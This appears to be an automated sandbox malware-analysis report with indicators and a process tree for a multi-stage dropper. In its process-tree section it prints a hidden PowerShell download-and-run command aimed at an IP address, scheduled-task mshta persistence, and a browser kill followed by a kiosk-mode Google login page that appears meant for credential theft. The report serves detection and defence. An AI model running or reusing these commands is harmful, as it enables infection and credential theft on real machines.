description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mAtJWNv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mAtJWNv.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4572 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 3804 taskkill.exe 1784 taskkill.exe 4280 taskkill.exe 4472 taskkill.exe 4100 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133857006042876473" chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3472 schtasks.exe 5016 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 532 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe 532 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe 532 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe 532 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe 532 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe 532 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe 2140 OPC2VURIHUPRBGIGMXLLRVVJD.exe 2140 OPC2VURIHUPRBGIGMXLLRVVJD.exe 2940 rapes.exe 2940 rapes.exe 1496 powershell.exe 1496 powershell.exe 1496 powershell.exe 3564 vertualiziren.exe 3564 vertualiziren.exe 3036 rapes.exe 3036 rapes.exe 3820 powershell.exe 3820 powershell.exe 3820 powershell.exe 3948 TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE 3948 TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE 532 powershell.exe 532 powershell.exe 532 powershell.exe 4264 powershell.exe 4264 powershell.exe 4264 powershell.exe 936 powershell.exe 936 powershell.exe 936 powershell.exe 1200 721702bd23.exe 1200 721702bd23.exe 916 483d2fa8a0d53818306efeb32d3.exe 916 483d2fa8a0d53818306efeb32d3.exe 4684 bc3a1e6a75.exe 4684 bc3a1e6a75.exe 4684 bc3a1e6a75.exe 4684 bc3a1e6a75.exe 628 36bd318e4d.exe 628 36bd318e4d.exe 2688 acdc33ee92.exe 2688 acdc33ee92.exe 440 1590993906.exe 440 1590993906.exe 440 1590993906.exe 440 1590993906.exe 440 1590993906.exe 440 1590993906.exe 3740 0IR2HSX48POW1VIT6VA.exe 3740 0IR2HSX48POW1VIT6VA.exe 4428 be9629c306.exe 4428 be9629c306.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 1496 rapes.exe 1496 rapes.exe 2916 ovql.exe 2916 ovql.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3960 dd3907672e.exe 3960 dd3907672e.exe 3960 dd3907672e.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 2476 msedge.exe 2476 msedge.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeDebugPrivilege 1496 powershell.exe Token: SeDebugPrivilege 3820 powershell.exe Token: SeDebugPrivilege 532 powershell.exe Token: SeDebugPrivilege 4264 powershell.exe Token: SeDebugPrivilege 936 powershell.exe Token: SeDebugPrivilege 3988 bc3a1e6a75.exe Token: SeDebugPrivilege 4100 taskkill.exe Token: SeDebugPrivilege 3804 taskkill.exe Token: SeDebugPrivilege 1784 taskkill.exe Token: SeDebugPrivilege 4280 taskkill.exe Token: SeDebugPrivilege 4472 taskkill.exe Token: SeDebugPrivilege 4428 firefox.exe Token: SeDebugPrivilege 4428 firefox.exe Token: SeDebugPrivilege 3960 dd3907672e.exe Token: SeDebugPrivilege 2484 ce4pMzk.exe Token: SeDebugPrivilege 5828 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeShutdownPrivilege 5716 chrome.exe Token: SeCreatePagefilePrivilege 5716 chrome.exe Token: SeShutdownPrivilege 5716 chrome.exe Token: SeCreatePagefilePrivilege 5716 chrome.exe Token: SeShutdownPrivilege 5716 chrome.exe Token: SeCreatePagefilePrivilege 5716 chrome.exe Token: SeDebugPrivilege 6544 powershell.exe Token: SeShutdownPrivilege 5716 chrome.exe Token: SeCreatePagefilePrivilege 5716 chrome.exe Token: SeShutdownPrivilege 5716 chrome.exe Token: SeCreatePagefilePrivilege 5716 chrome.exe Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 5716 chrome.exe Token: SeCreatePagefilePrivilege 5716 chrome.exe Token: SeShutdownPrivilege 5716 chrome.exe Token: SeCreatePagefilePrivilege 5716 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2140 OPC2VURIHUPRBGIGMXLLRVVJD.exe 4464 e3d77cfb89.exe 4464 e3d77cfb89.exe 4464 e3d77cfb89.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 5716 chrome.exe 2476 msedge.exe 2476 msedge.exe -
Suspicious use of SendNotifyMessage 34 IoCs
pid Process 4464 e3d77cfb89.exe 4464 e3d77cfb89.exe 4464 e3d77cfb89.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 4428 firefox.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe 3108 22e7923b7d.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4428 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 532 wrote to memory of 2140 532 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe 95 PID 532 wrote to memory of 2140 532 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe 95 PID 532 wrote to memory of 2140 532 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe 95 PID 2140 wrote to memory of 2940 2140 OPC2VURIHUPRBGIGMXLLRVVJD.exe 96 PID 2140 wrote to memory of 2940 2140 OPC2VURIHUPRBGIGMXLLRVVJD.exe 96 PID 2140 wrote to memory of 2940 2140 OPC2VURIHUPRBGIGMXLLRVVJD.exe 96 PID 2940 wrote to memory of 4280 2940 rapes.exe 99 PID 2940 wrote to memory of 4280 2940 rapes.exe 99 PID 2940 wrote to memory of 4280 2940 rapes.exe 99 PID 4280 wrote to memory of 2576 4280 nhDLtPT.exe 100 PID 4280 wrote to memory of 2576 4280 nhDLtPT.exe 100 PID 4280 wrote to memory of 2576 4280 nhDLtPT.exe 100 PID 2940 wrote to memory of 4464 2940 rapes.exe 101 PID 2940 wrote to memory of 4464 2940 rapes.exe 101 PID 2940 wrote to memory of 4464 2940 rapes.exe 101 PID 4464 wrote to memory of 2696 4464 e3d77cfb89.exe 102 PID 4464 wrote to memory of 2696 4464 e3d77cfb89.exe 102 PID 4464 wrote to memory of 2696 4464 e3d77cfb89.exe 102 PID 4464 wrote to memory of 4864 4464 e3d77cfb89.exe 103 PID 4464 wrote to memory of 4864 4464 e3d77cfb89.exe 103 PID 4464 wrote to memory of 4864 4464 e3d77cfb89.exe 103 PID 2696 wrote to memory of 3472 2696 cmd.exe 105 PID 2696 wrote to memory of 3472 2696 cmd.exe 105 PID 2696 wrote to memory of 3472 2696 cmd.exe 105 PID 4864 wrote to memory of 1496 4864 mshta.exe 106 PID 4864 wrote to memory of 1496 4864 mshta.exe 106 PID 4864 wrote to memory of 1496 4864 mshta.exe 106 PID 2576 wrote to memory of 3564 2576 Gxtuum.exe 108 PID 2576 wrote to memory of 3564 2576 Gxtuum.exe 108 PID 2576 wrote to memory of 3564 2576 Gxtuum.exe 108 PID 2940 wrote to memory of 1060 2940 rapes.exe 111 PID 2940 wrote to memory of 1060 2940 rapes.exe 111 PID 2940 wrote to memory of 1060 2940 rapes.exe 111 PID 1060 wrote to memory of 4572 1060 cmd.exe 113 PID 1060 wrote to memory of 4572 1060 cmd.exe 113 PID 1060 wrote to memory of 4572 1060 cmd.exe 113 PID 1060 wrote to memory of 4500 1060 cmd.exe 114 PID 1060 wrote to memory of 4500 1060 cmd.exe 114 PID 1060 wrote to memory of 4500 1060 cmd.exe 114 PID 4500 wrote to memory of 3820 4500 cmd.exe 115 PID 4500 wrote to memory of 3820 4500 cmd.exe 115 PID 4500 wrote to memory of 3820 4500 cmd.exe 115 PID 1496 wrote to memory of 3948 1496 powershell.exe 116 PID 1496 wrote to memory of 3948 1496 powershell.exe 116 PID 1496 wrote to memory of 3948 1496 powershell.exe 116 PID 1060 wrote to memory of 1916 1060 cmd.exe 117 PID 1060 wrote to memory of 1916 1060 cmd.exe 117 PID 1060 wrote to memory of 1916 1060 cmd.exe 117 PID 1916 wrote to memory of 532 1916 cmd.exe 118 PID 1916 wrote to memory of 532 1916 cmd.exe 118 PID 1916 wrote to memory of 532 1916 cmd.exe 118 PID 1060 wrote to memory of 4664 1060 cmd.exe 120 PID 1060 wrote to memory of 4664 1060 cmd.exe 120 PID 1060 wrote to memory of 4664 1060 cmd.exe 120 PID 4664 wrote to memory of 4264 4664 cmd.exe 121 PID 4664 wrote to memory of 4264 4664 cmd.exe 121 PID 4664 wrote to memory of 4264 4664 cmd.exe 121 PID 1060 wrote to memory of 5016 1060 cmd.exe 122 PID 1060 wrote to memory of 5016 1060 cmd.exe 122 PID 1060 wrote to memory of 5016 1060 cmd.exe 122 PID 1060 wrote to memory of 4768 1060 cmd.exe 123 PID 1060 wrote to memory of 4768 1060 cmd.exe 123 PID 1060 wrote to memory of 4768 1060 cmd.exe 123 PID 4768 wrote to memory of 936 4768 mshta.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3532 -
C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe"C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"6⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3564
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe"C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 6QKiRmaQMTY /tr "mshta C:\Users\Admin\AppData\Local\Temp\kao0wjnJg.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 6QKiRmaQMTY /tr "mshta C:\Users\Admin\AppData\Local\Temp\kao0wjnJg.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3472
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\kao0wjnJg.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE"C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3948
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\timeout.exetimeout /t 26⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "qUdp4ma4jJN" /tr "mshta \"C:\Temp\m9sy3Qpjo.hta\"" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5016
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\m9sy3Qpjo.hta"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:916
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe"C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1200 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3948
-
-
-
C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3988 -
C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"6⤵
- Executes dropped EXE
PID:3636
-
-
C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 8206⤵
- Program crash
PID:3312
-
-
-
C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe"C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:628 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:2568
-
-
-
C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe"C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2688
-
-
C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe"C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:440 -
C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe"C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3740
-
-
-
C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe"C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4428
-
-
C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe"C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3108 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4472
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:4892
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4428 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d71a98c4-74cc-46cd-842d-20a1d41903dd} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" gpu8⤵PID:232
-
-
